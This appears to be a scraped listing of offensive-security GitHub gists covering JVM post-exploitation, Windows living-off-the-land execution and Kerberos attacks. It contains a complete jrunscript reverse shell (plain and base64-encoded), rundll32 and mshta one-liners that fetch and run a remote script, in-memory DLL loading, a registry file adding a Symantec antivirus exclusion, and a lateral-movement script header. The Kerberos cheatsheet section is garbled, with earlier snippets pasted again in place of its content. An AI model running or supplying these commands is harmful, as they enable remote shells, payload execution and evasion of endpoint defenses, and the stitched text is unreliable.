Hello-xBugs

## README.md

      
              1 file
            
          
              2 forks
            
          
              1 comment
            
          
              14 stars
            
          
                pwntester
                / README.md
            
            
              Last active
              April 19, 2022 11:51
            
              
                JRE8 RCE gadget
              
          
    Pure JRE 8 RCE Deserialization gadget

Based on Chris Frohoff and Wouter Coekaerts ideas:

https://gist.github.com/frohoff/24af7913611f8406eaf3
http://wouter.coekaerts.be/2015/annotationinvocationhandler

Full project (containing dependencies) can be found here:

https://github.com/pwntester/JRE8u20_RCE_Gadget


## JVM_POST_EXPLOIT.md

      
              1 file
            
          
              23 forks
            
          
              2 comments
            
          
              50 stars
            
          
                frohoff
                / JVM_POST_EXPLOIT.md
            
            
              Last active
              December 13, 2023 15:02
            
              
                JVM Post-Exploitation One-Liners
              
          
    Nashorn / Rhino:

Reverse Shell

$ jrunscript -e 'var host="localhost"; var port=8044; var cmd="cmd.exe"; var p=new java.lang.ProcessBuilder(cmd).redirectErrorStream(true).start();var s=new java.net.Socket(host,port);var pi=p.getInputStream(),pe=p.getErrorStream(), si=s.getInputStream();var po=p.getOutputStream(),so=s.getOutputStream();while(!s.isClosed()){while(pi.available()>0)so.write(pi.read());while(pe.available()>0)so.write(pe.read());while(si.available()>0)po.write(si.read());so.flush();po.flush();java.lang.Thread.sleep(50);try {p.exitValue();break;}catch (e){}};p.destroy();s.close();'

Reverse Shell (Base-64 encoded)

$ jrunscript -e 'eval(new java.lang.String(javax.xml.bind.DatatypeConverter.parseBase64Binary("dmFyIGhvc3Q9ImxvY2FsaG9zdCI7IHZhciBwb3J0PTgwNDQ7IHZhciBjbWQ9ImNtZC5leGUiOyB2YXIgcD1uZXcgamF2YS5sYW5nLlByb2Nlc3NCdWlsZGVyKGNtZCkucmVkaXJlY3RFcnJvclN0cmVhbSh0cnVlKS5zdGFydCgpO3ZhciBzPW5ldyBqYXZhLm5ldC5Tb2NrZXQoaG9zdCxwb3J0KTt2YXIgcGk9cC5nZXRJbnB1dFN0cmVhbSgpLHBlPXAuZ2V

  
## instructions.txt
xwizard RunWizard {00000001-0000-0000-0000-0000FEEDACDC}
verclsid.exe /S /C {00000001-0000-0000-0000-0000FEEDACDC}
create new folder and rename file.{00000001-0000-0000-0000-0000FEEDACDC}
rundll32.exe javascript:"\..\mshtml.dll,RunHTMLApplication ";o=GetObject("script:https://gist.githubusercontent.com/NickTyrer/0598b60112eaafe6d07789f7964290d5/raw/7717cfad109fc15a6796dd9119b0267f7a4df3fd/power.sct");close();
mshta javascript:o=GetObject("script:https://gist.githubusercontent.com/NickTyrer/0598b60112eaafe6d07789f7964290d5/raw/7717cfad109fc15a6796dd9119b0267f7a4df3fd/power.sct");o.Exec();close();

## akagi_42b.c
typedef interface IFwCplLua IFwCplLua;

typedef struct IFwCplLuaInterfaceVtbl {

    BEGIN_INTERFACE

        HRESULT(STDMETHODCALLTYPE *QueryInterface)(
            __RPC__in IFwCplLua * This,
            __RPC__in REFIID riid,
            _COM_Outptr_  void **ppvObject);

## LoadInMemoryModule.ps1
$Domain = [AppDomain]::CurrentDomain
$DynAssembly = New-Object System.Reflection.AssemblyName('TempAssembly')
$AssemblyBuilder = $Domain.DefineDynamicAssembly($DynAssembly, [Reflection.Emit.AssemblyBuilderAccess]::Run)
$ModuleBuilder = $AssemblyBuilder.DefineDynamicModule('TempModule')
# Create a stub module that the in-memory module (i.e. this mimics the loading of a netmodule at runtime) will be loaded into.
$ModuleBuilder2 = $AssemblyBuilder.DefineDynamicModule('hello.dll')
$TypeBuilder = $ModuleBuilder.DefineType('TempClass', [Reflection.TypeAttributes]::Public)
$TypeBuilder.CreateType()
$HelloDllBytes = [Convert]::FromBase64String('TVqQAAMAAAAEAAAA//8AALgAAAAAAAAAQAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAgAAAAA4fug4AtAnNIbgBTM0hVGhpcyBwcm9ncmFtIGNhbm5vdCBiZSBydW4gaW4gRE9TIG1vZGUuDQ0KJAAAAAAAAABQRQAATAEDAJNPvloAAAAAAAAAAOAAAiELAQsAAAQAAAAGAAAAAAAAPiMAAAAgAAAAQAAAAAAAEAAgAAAAAgAABAAAAAAAAAAEAAAAAAAAAACAAAAAAgAAAAAAAAMAQIUAABAAABAAAAAAEAAAEAAAAAAAABAAAAAAAAAAAAAAAOQiAABXAAAAAEAAAJgCAAAAAAAAAAAAAAAAAAA

## clr_via_native.c
#include "stdafx.h"

int main()
{
	ICLRMetaHost *metaHost = NULL;
	IEnumUnknown *runtime = NULL;
	ICLRRuntimeInfo *runtimeInfo = NULL;
	ICLRRuntimeHost *runtimeHost = NULL;
	IUnknown *enumRuntime = NULL;
	LPWSTR frameworkName = NULL;

## sep-directory-exclusion.reg
Windows Registry Editor Version 5.00

[HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Symantec\Symantec Endpoint Protection\AV\Exclusions\ScanningEngines\Directory\Client\1733004144]
"Owner"=dword:00000004
"ProtectionTechnology"=dword:00000001
"FirstAction"=dword:00000011
"SecondAction"=dword:00000011
"DirectoryName"="C:\\to\\be\\excluded\\"
"ThreatName"="C:\\to\\be\\excluded\\"
"ExcludeSubDirs"=dword:00000001

## DllLoadAnythingViaScript
#Doesn't Even Have to Be A Conformant COM DLL To trigger the load.

# Sample DLL To inject here
# https://github.com/redcanaryco/atomic-red-team/tree/master/atomics/T1179

$manifest = '<?xml version="1.0" encoding="UTF-16" standalone="yes"?> <assembly xmlns="urn:schemas-microsoft-com:asm.v1" manifestVersion="1.0"> 	<assemblyIdentity type="win32" name="LiterallyDoesentMatter" version="6.6.6.0"/> 	<file name="Anyname.dll.anything">     	<comClass         	description="Any Description HERE"         	clsid="{89565276-A714-4a43-91FE-EDACDCC0FFEE}" threadingModel="Both"         	progid="JustMakeSomethingUp"/> 	</file>  </assembly>';
$ax = new-object -Com "Microsoft.Windows.ActCtx"
$ax.ManifestText = $manifest;
$DWX = $ax.CreateObject("JustMakeSomethingUp");

## Invoke-AccessXSLT.ps1
<#
    Lateral Movement Via MSACCESS TransformXML
    Author: Philip Tsukerman (@PhilipTsukerman)
    License: BSD 3-Clause
    Required Dependencies: None
    Optional Dependencies: None
#>

function Invoke-AccessXSLT {
<#

## kerberos_attacks_cheatsheet.md

      
              1 file
            
          
              376 forks
            
          
              5 comments
            
          
              1092 stars
            
          
                TarlogicSecurity
                / kerberos_attacks_cheatsheet.md
            
            
              Created
              May 14, 2019 13:33
            
              
                A cheatsheet with commands that can be used to perform kerberos attacks
              
          
    Kerberos cheatsheet

Bruteforcing

With kerbrute.py:
python kerbrute.py -domain <domain_name> -users <users_file> -passwords <passwords_file> -outputfile <output_file>
With Rubeus version with brute module:
	xwizard RunWizard {00000001-0000-0000-0000-0000FEEDACDC}
	verclsid.exe /S /C {00000001-0000-0000-0000-0000FEEDACDC}
	create new folder and rename file.{00000001-0000-0000-0000-0000FEEDACDC}
	rundll32.exe javascript:"\..\mshtml.dll,RunHTMLApplication ";o=GetObject("script:https://gist.githubusercontent.com/NickTyrer/0598b60112eaafe6d07789f7964290d5/raw/7717cfad109fc15a6796dd9119b0267f7a4df3fd/power.sct");close();
	mshta javascript:o=GetObject("script:https://gist.githubusercontent.com/NickTyrer/0598b60112eaafe6d07789f7964290d5/raw/7717cfad109fc15a6796dd9119b0267f7a4df3fd/power.sct");o.Exec();close();
	typedef interface IFwCplLua IFwCplLua;

	typedef struct IFwCplLuaInterfaceVtbl {

	BEGIN_INTERFACE

	HRESULT(STDMETHODCALLTYPE *QueryInterface)(
	__RPC__in IFwCplLua * This,
	__RPC__in REFIID riid,
	_COM_Outptr_ void **ppvObject);
	$Domain = [AppDomain]::CurrentDomain
	$DynAssembly = New-Object System.Reflection.AssemblyName('TempAssembly')
	$AssemblyBuilder = $Domain.DefineDynamicAssembly($DynAssembly, [Reflection.Emit.AssemblyBuilderAccess]::Run)
	$ModuleBuilder = $AssemblyBuilder.DefineDynamicModule('TempModule')
	# Create a stub module that the in-memory module (i.e. this mimics the loading of a netmodule at runtime) will be loaded into.
	$ModuleBuilder2 = $AssemblyBuilder.DefineDynamicModule('hello.dll')
	$TypeBuilder = $ModuleBuilder.DefineType('TempClass', [Reflection.TypeAttributes]::Public)
	$TypeBuilder.CreateType()
	$HelloDllBytes = [Convert]::FromBase64String('TVqQAAMAAAAEAAAA//8AALgAAAAAAAAAQAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAgAAAAA4fug4AtAnNIbgBTM0hVGhpcyBwcm9ncmFtIGNhbm5vdCBiZSBydW4gaW4gRE9TIG1vZGUuDQ0KJAAAAAAAAABQRQAATAEDAJNPvloAAAAAAAAAAOAAAiELAQsAAAQAAAAGAAAAAAAAPiMAAAAgAAAAQAAAAAAAEAAgAAAAAgAABAAAAAAAAAAEAAAAAAAAAACAAAAAAgAAAAAAAAMAQIUAABAAABAAAAAAEAAAEAAAAAAAABAAAAAAAAAAAAAAAOQiAABXAAAAAEAAAJgCAAAAAAAAAAAAAAAAAAA
	#include "stdafx.h"

	int main()
	{
	ICLRMetaHost *metaHost = NULL;
	IEnumUnknown *runtime = NULL;
	ICLRRuntimeInfo *runtimeInfo = NULL;
	ICLRRuntimeHost *runtimeHost = NULL;
	IUnknown *enumRuntime = NULL;
	LPWSTR frameworkName = NULL;
	Windows Registry Editor Version 5.00

	[HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Symantec\Symantec Endpoint Protection\AV\Exclusions\ScanningEngines\Directory\Client\1733004144]
	"Owner"=dword:00000004
	"ProtectionTechnology"=dword:00000001
	"FirstAction"=dword:00000011
	"SecondAction"=dword:00000011
	"DirectoryName"="C:\\to\\be\\excluded\\"
	"ThreatName"="C:\\to\\be\\excluded\\"
	"ExcludeSubDirs"=dword:00000001
	#Doesn't Even Have to Be A Conformant COM DLL To trigger the load.

	# Sample DLL To inject here
	# https://github.com/redcanaryco/atomic-red-team/tree/master/atomics/T1179

	$manifest = '<?xml version="1.0" encoding="UTF-16" standalone="yes"?> <assembly xmlns="urn:schemas-microsoft-com:asm.v1" manifestVersion="1.0"> <assemblyIdentity type="win32" name="LiterallyDoesentMatter" version="6.6.6.0"/> <file name="Anyname.dll.anything"> <comClass description="Any Description HERE" clsid="{89565276-A714-4a43-91FE-EDACDCC0FFEE}" threadingModel="Both" progid="JustMakeSomethingUp"/> </file> </assembly>';
	$ax = new-object -Com "Microsoft.Windows.ActCtx"
	$ax.ManifestText = $manifest;
	$DWX = $ax.CreateObject("JustMakeSomethingUp");
	<#
	Lateral Movement Via MSACCESS TransformXML
	Author: Philip Tsukerman (@PhilipTsukerman)
	License: BSD 3-Clause
	Required Dependencies: None
	Optional Dependencies: None
	#>

	function Invoke-AccessXSLT {
	<#